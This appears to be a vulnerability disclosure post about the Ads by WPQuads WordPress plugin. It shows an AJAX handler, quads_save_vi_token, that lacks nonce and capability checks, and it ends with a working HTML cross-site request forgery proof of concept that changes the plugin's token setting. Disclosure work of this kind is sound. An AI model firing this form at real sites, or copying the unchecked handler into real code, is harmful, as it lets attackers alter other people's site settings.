Login
27 Jan 2023

Authenticated Settings Change Vulnerability in Ads by WPQuads

One of the changelog entries for a recent version of the WordPress plugin Ads by WPQuads suggested a vulnerability was fixed:

Fixed: Nonce missing inside ajax call handler quads_send_feedback #670

The number there is a reference to a GitHub issue for the plugin, which lacks any more details on the issue.

Looking at the changes made in the version this was supposed to be addressed in, we found a nonce check being added to somewhere it isn’t needed, since the nonce check would have already happened. It wasn’t added to the function referenced in the changelog and there hasn’t been a nonce check added there in a subsequent version. That function, quads_send_feedback(), is located in the file /includes/helper-functions.php.

That function is for sending feedback to the developer, so the security risk there seems rather limited. Looking at the plugin’s code, though, we found that other AJAX accessible functions are similarly still not secured.

For example, in the file /includes/admin/admin-actions.php, the function is made accessible to anyone logged in to WordPress:

118

add_action('wp_ajax_quads_save_vi_token', 'quads_save_vi_token');

That function will save a token for the plugin without checking for a nonce, which prevents cross-site request forgery (CSRF), and also without doing a capabilities check to limit who has access to changing the setting:

79
80
81
82
83
84
85
86
87
88

function quads_save_vi_token() {
    global $quads_options;
 
    if (empty($_POST['token'])) {
        echo json_encode(array("status" => "failed"));
        wp_die();
    }
 
    // Save token before trying to create ads.txt
    update_option('quads_vi_token', $_POST['token']);

So anyone logged in to WordPress can change that and an attacker could cause anyone logged in to change that without intending it through CSRF.

We notified the developer of the issue yesterday, but we have yet to receive a response and the issue has for not been resolved.

Proof of Concept

The following proof of concept will change to quads_vi_token WordPress setting (option) to “proofofconcept”, when logged in to WordPress.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=quads_save_vi_token" method="POST">
<input type="hidden" name="token" value="proofofconcept" />
<input type="submit" value="Submit" />
</form>
</body>

No related posts.

Leave a Reply

Your email address will not be published.